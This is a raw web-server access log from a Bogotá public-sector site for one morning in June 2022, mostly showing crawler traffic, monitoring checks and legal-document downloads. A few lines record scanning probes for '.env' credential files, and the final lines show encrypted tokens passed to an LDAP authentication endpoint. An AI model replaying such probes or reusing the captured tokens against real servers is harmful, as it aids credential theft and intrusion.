172.22.2.4 - - [16/Jun/2022:02:42:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
216.245.221.92 - - [16/Jun/2022:02:46:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:47:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [16/Jun/2022:02:49:33 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:02:48:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:02:51:36 -0500] "HEAD / HTTP/1.1" 200 -
2.57.122.35 - - [16/Jun/2022:02:53:33 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:02:53:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:54:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
216.245.221.92 - - [16/Jun/2022:02:56:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.15 - - [16/Jun/2022:02:56:50 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:02:59:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:03:01:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:00:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
66.249.65.15 - - [16/Jun/2022:03:03:54 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:03:06:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:05:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:06:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
66.249.65.13 - - [16/Jun/2022:03:09:37 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:03:11:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:11:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:11:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
157.55.39.43 - - [16/Jun/2022:03:13:40 -0500] "GET /BLA/resoluciones/AUTOS%202014/4908.pdf HTTP/1.1" 304 -
143.198.155.121 - - [16/Jun/2022:03:14:09 -0500] "GET / HTTP/1.1" 200 319
147.182.239.192 - - [16/Jun/2022:03:14:45 -0500] "GET / HTTP/1.1" 200 319
137.184.7.33 - - [16/Jun/2022:03:15:12 -0500] "GET / HTTP/1.1" 200 319
40.77.167.21 - - [16/Jun/2022:03:16:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 304 -
216.245.221.92 - - [16/Jun/2022:03:16:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:16:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:17:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51524
66.249.65.13 - - [16/Jun/2022:03:19:36 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:03:21:36 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:03:21:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46902
201.245.192.253 - - [16/Jun/2022:03:22:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47414
157.55.39.127 - - [16/Jun/2022:03:23:29 -0500] "GET /BLA/resoluciones/AUTOS%202014/3739.pdf HTTP/1.1" 200 487694
172.22.2.4 - - [16/Jun/2022:03:22:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:23:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
216.245.221.92 - - [16/Jun/2022:03:26:36 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [16/Jun/2022:03:27:12 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:03:27:29 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
40.77.167.79 - - [16/Jun/2022:03:25:58 -0500] "GET /bla/boletinlegal/index.php/js/jquery.scrollto-min.js HTTP/1.1" 200 62718
172.22.2.4 - - [16/Jun/2022:03:27:30 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 57966
172.22.2.4 - - [16/Jun/2022:03:28:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
165.0.52.121 - - [16/Jun/2022:03:30:59 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [16/Jun/2022:03:29:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
216.245.221.92 - - [16/Jun/2022:03:31:36 -0500] "HEAD / HTTP/1.1" 200 -
143.198.235.10 - - [16/Jun/2022:03:31:40 -0500] "GET / HTTP/1.1" 200 319
143.198.155.121 - - [16/Jun/2022:03:31:53 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [16/Jun/2022:03:31:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46902
201.245.192.253 - - [16/Jun/2022:03:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47414
66.249.65.13 - - [16/Jun/2022:03:35:46 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:03:34:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:03:36:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:35:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
158.68.208.69 - - [16/Jun/2022:03:38:13 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
158.68.208.69 - - [16/Jun/2022:03:38:14 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
158.68.208.69 - - [16/Jun/2022:03:38:14 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [16/Jun/2022:03:41:36 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [16/Jun/2022:03:41:51 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:03:40:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:03:41:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46902
201.245.192.253 - - [16/Jun/2022:03:41:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47414
172.22.2.4 - - [16/Jun/2022:03:41:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
40.77.167.21 - - [16/Jun/2022:03:43:37 -0500] "GET /autoliquidacion2020 HTTP/1.1" 301 250
172.22.2.4 - - [16/Jun/2022:03:43:38 -0500] "GET /BLA/boletinlegal/Directivas/2022/DIRECTIVA%20No.%2000001%20DEL%2015%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 200 290944
40.77.167.21 - - [16/Jun/2022:03:43:47 -0500] "GET /autoliquidacion2020/ HTTP/1.1" 200 6146
172.22.2.4 - - [16/Jun/2022:03:45:14 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
157.55.39.8 - - [16/Jun/2022:03:45:16 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20008%20del%2001%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 1382642
207.46.13.67 - - [16/Jun/2022:03:45:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:03:45:15 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [16/Jun/2022:03:46:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:46:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
137.184.7.33 - - [16/Jun/2022:03:48:01 -0500] "GET / HTTP/1.1" 200 319
157.55.39.8 - - [16/Jun/2022:03:48:24 -0500] "GET /BLA/resoluciones/400-449.tif HTTP/1.1" 404 1018
172.22.2.4 - - [16/Jun/2022:03:46:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
216.245.221.92 - - [16/Jun/2022:03:51:36 -0500] "HEAD / HTTP/1.1" 200 -
144.126.215.91 - - [16/Jun/2022:03:51:58 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:03:51:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [16/Jun/2022:03:51:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [16/Jun/2022:03:51:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:52:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48336
172.22.2.4 - - [16/Jun/2022:03:52:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49042
40.77.167.79 - - [16/Jun/2022:03:56:09 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02827.pdf HTTP/1.1" 200 376086
216.245.221.92 - - [16/Jun/2022:03:56:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:03:57:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.189.121 - - [16/Jun/2022:03:59:34 -0500] "GET /dlf/styles.css HTTP/1.1" 404 1018
172.22.2.4 - - [16/Jun/2022:03:58:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
216.245.221.92 - - [16/Jun/2022:04:01:36 -0500] "HEAD / HTTP/1.1" 200 -
165.232.144.206 - - [16/Jun/2022:04:02:08 -0500] "GET / HTTP/1.1" 200 319
143.244.189.71 - - [16/Jun/2022:04:02:10 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:04:03:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
144.126.215.91 - - [16/Jun/2022:04:06:00 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:04:04:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:04:06:36 -0500] "HEAD / HTTP/1.1" 200 -
209.141.57.178 - - [16/Jun/2022:04:07:08 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
172.22.2.4 - - [16/Jun/2022:04:09:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:04:11:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:10:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
202.73.34.226 - - [16/Jun/2022:04:13:17 -0500] "GET /.env HTTP/1.1" 404 1018
202.73.34.226 - - [16/Jun/2022:04:13:18 -0500] "POST / HTTP/1.1" 200 319
216.245.221.92 - - [16/Jun/2022:04:16:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:15:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:16:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:04:21:36 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:04:21:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46913
40.77.167.79 - - [16/Jun/2022:04:22:03 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 200 515008
45.137.20.97 - - [16/Jun/2022:04:22:35 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:04:21:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:04:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 21442
34.91.0.0 - - [16/Jun/2022:04:23:09 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:04:21:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
172.22.2.4 - - [16/Jun/2022:04:23:50 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
216.245.221.92 - - [16/Jun/2022:04:26:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:26:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:27:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
173.252.107.120 - - [16/Jun/2022:04:31:14 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
173.252.127.24 - - [16/Jun/2022:04:31:18 -0500] "GET /images/Naturalista1.jpeg HTTP/1.1" 200 202073
216.245.221.92 - - [16/Jun/2022:04:31:36 -0500] "HEAD / HTTP/1.1" 200 -
165.232.157.181 - - [16/Jun/2022:04:31:45 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [16/Jun/2022:04:31:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46913
201.245.192.253 - - [16/Jun/2022:04:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47406
172.22.2.4 - - [16/Jun/2022:04:32:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:33:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:04:36:36 -0500] "HEAD / HTTP/1.1" 200 -
147.182.239.192 - - [16/Jun/2022:04:39:40 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:04:38:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:39:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:04:41:36 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:04:41:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46913
201.245.192.253 - - [16/Jun/2022:04:42:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47406
157.55.39.43 - - [16/Jun/2022:04:43:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/5475.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2022:04:44:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:04:46:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:45:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:04:51:36 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.79 - - [16/Jun/2022:04:51:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4156.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2022:04:50:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:04:51:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:04:56:36 -0500] "HEAD / HTTP/1.1" 200 -
114.119.144.65 - - [16/Jun/2022:04:56:46 -0500] "-" 408 -
114.119.152.97 - - [16/Jun/2022:04:57:18 -0500] "-" 408 -
40.77.167.21 - - [16/Jun/2022:04:57:24 -0500] "GET /Autoliquidacion/index.php?dir= HTTP/1.1" 200 6629
157.55.39.43 - - [16/Jun/2022:04:57:39 -0500] "GET /Autoliquidacion/dlf/styles.css HTTP/1.1" 200 3045
172.22.2.4 - - [16/Jun/2022:04:56:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.147.74 - - [16/Jun/2022:04:57:49 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:04:56:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
40.77.167.21 - - [16/Jun/2022:04:58:34 -0500] "GET /BLA/resoluciones/AUTOS%202014/4034.pdf HTTP/1.1" 200 517611
216.245.221.92 - - [16/Jun/2022:05:01:36 -0500] "HEAD / HTTP/1.1" 200 -
138.197.66.84 - - [16/Jun/2022:05:02:49 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [16/Jun/2022:05:01:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:02:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:05:06:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:07:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
138.197.66.84 - - [16/Jun/2022:05:09:37 -0500] "GET / HTTP/1.1" 200 319
138.197.66.84 - - [16/Jun/2022:05:09:38 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [16/Jun/2022:05:08:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54661
40.77.167.79 - - [16/Jun/2022:05:10:57 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [16/Jun/2022:05:11:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:11:50 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [16/Jun/2022:05:11:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 200 25380
172.22.2.4 - - [16/Jun/2022:05:13:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:14:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
216.245.221.92 - - [16/Jun/2022:05:16:36 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.21 - - [16/Jun/2022:05:16:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0299.pdf HTTP/1.1" 304 -
139.59.163.229 - - [16/Jun/2022:05:20:31 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
172.22.2.4 - - [16/Jun/2022:05:19:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:05:21:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:20:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57966
201.245.192.253 - - [16/Jun/2022:05:21:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46925
201.245.192.253 - - [16/Jun/2022:05:21:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47410
157.55.39.6 - - [16/Jun/2022:05:23:38 -0500] "GET /images/semana-santa-ramos-policia-7-abril.jpg HTTP/1.1" 200 43922
216.245.221.92 - - [16/Jun/2022:05:26:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:25:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:26:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:05:31:36 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:05:31:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46925
172.22.2.4 - - [16/Jun/2022:05:31:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:05:32:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47410
172.22.2.4 - - [16/Jun/2022:05:31:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:05:36:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:36:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:37:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
42.236.10.71 - - [16/Jun/2022:05:40:58 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
216.245.221.92 - - [16/Jun/2022:05:41:36 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:05:41:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46925
172.22.2.4 - - [16/Jun/2022:05:41:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [16/Jun/2022:05:42:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47410
172.22.2.4 - - [16/Jun/2022:05:44:13 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2022:05:42:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:43:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
216.245.221.92 - - [16/Jun/2022:05:46:36 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.21 - - [16/Jun/2022:05:47:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20850-899.tif HTTP/1.1" 200 6189794
157.55.39.127 - - [16/Jun/2022:05:49:32 -0500] "GET /Publicaciones/2022EE85078.pdf HTTP/1.1" 404 227
172.22.2.4 - - [16/Jun/2022:05:48:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:49:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57591
216.245.221.92 - - [16/Jun/2022:05:51:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:52:40 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%201%20del%2012%20de%20Abril%20de%202011.pdf HTTP/1.1" 200 366269
190.253.175.83 - - [16/Jun/2022:05:52:48 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
190.253.175.83 - - [16/Jun/2022:05:52:48 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
190.253.175.83 - - [16/Jun/2022:05:52:48 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
190.253.175.83 - - [16/Jun/2022:05:52:48 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
190.253.175.83 - - [16/Jun/2022:05:52:48 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
190.253.175.83 - - [16/Jun/2022:05:52:48 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.253.175.83 - - [16/Jun/2022:05:54:33 -0500] "POST /appsia/controlador HTTP/1.1" 200 3603
190.253.175.83 - - [16/Jun/2022:05:54:33 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
190.253.175.83 - - [16/Jun/2022:05:54:59 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
190.253.175.83 - - [16/Jun/2022:05:55:51 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
172.22.2.4 - - [16/Jun/2022:05:54:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.253.175.83 - - [16/Jun/2022:05:56:10 -0500] "POST /appsia/controlador HTTP/1.1" 200 7793
190.253.175.83 - - [16/Jun/2022:05:56:20 -0500] "POST /appsia/controlador HTTP/1.1" 200 6658
190.253.175.83 - - [16/Jun/2022:05:56:35 -0500] "POST /appsia/controlador HTTP/1.1" 200 11709
216.245.221.92 - - [16/Jun/2022:05:56:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:05:55:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
190.253.175.83 - - [16/Jun/2022:05:56:56 -0500] "POST /appsia/controlador HTTP/1.1" 200 76043
40.77.167.21 - - [16/Jun/2022:05:58:01 -0500] "GET /bla/resoluciones/resoluciones%202021/1920.pdf HTTP/1.1" 200 509233
190.253.175.83 - - [16/Jun/2022:05:58:07 -0500] "POST /appsia/controlador HTTP/1.1" 200 7793
190.253.175.83 - - [16/Jun/2022:05:58:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
157.55.39.8 - - [16/Jun/2022:05:58:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1695.pdf HTTP/1.1" 200 827863
216.245.221.92 - - [16/Jun/2022:06:01:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:00:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:01:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
173.44.40.53 - - [16/Jun/2022:06:05:08 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
216.245.221.92 - - [16/Jun/2022:06:06:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:06:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:06:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
207.46.13.172 - - [16/Jun/2022:06:10:04 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/NormatividadPEV.pdf HTTP/1.1" 200 96211
216.245.221.92 - - [16/Jun/2022:06:11:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:11:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:12:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
207.46.13.172 - - [16/Jun/2022:06:15:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0005.pdf HTTP/1.1" 304 -
216.245.221.92 - - [16/Jun/2022:06:16:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:17:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:18:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:06:21:36 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:06:21:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46956
40.77.167.79 - - [16/Jun/2022:06:22:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3206.pdf HTTP/1.1" 304 -
157.55.39.8 - - [16/Jun/2022:06:22:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/1827.pdf HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2022:06:22:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47431
40.77.167.21 - - [16/Jun/2022:06:23:43 -0500] "GET /BLA/resoluciones/AUTOS%202014/1641.pdf HTTP/1.1" 200 535665
172.22.2.4 - - [16/Jun/2022:06:23:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.170.244 - - [16/Jun/2022:06:25:17 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18KSr7cnnmzR4h2O70wqBVdS2cVg7qY0bb2cL+duE/wHIyMYBqcFPro&y=U2FsdGVkX18GPmhq0Iylr4bGXVVJTdMcK3yk8gtZlgdciIUObv3G8j/fV/NX0Ew1 HTTP/1.1" 200 30
186.29.170.244 - - [16/Jun/2022:06:25:17 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19lav0cB+AT64VkPBO0DbvupGTrWyrYWLGUg/WqJjO/3xYK+3Ev2ZfnfnXF93dojs5nTlTuJ0yj1YcZm+KegcsBd0nDBfXLpy8=&u=U2FsdGVkX19qR4DMyi4YNPUFUjUc5zgBI9Tbugc5SKtJ2VfgmFqdoDF8DuzGtOJF&y=U2FsdGVkX18GPmhq0Iylr4bGXVVJTdMcK3yk8gtZlgdciIUObv3G8j/fV/NX0Ew1 HTTP/1.1" 200 97
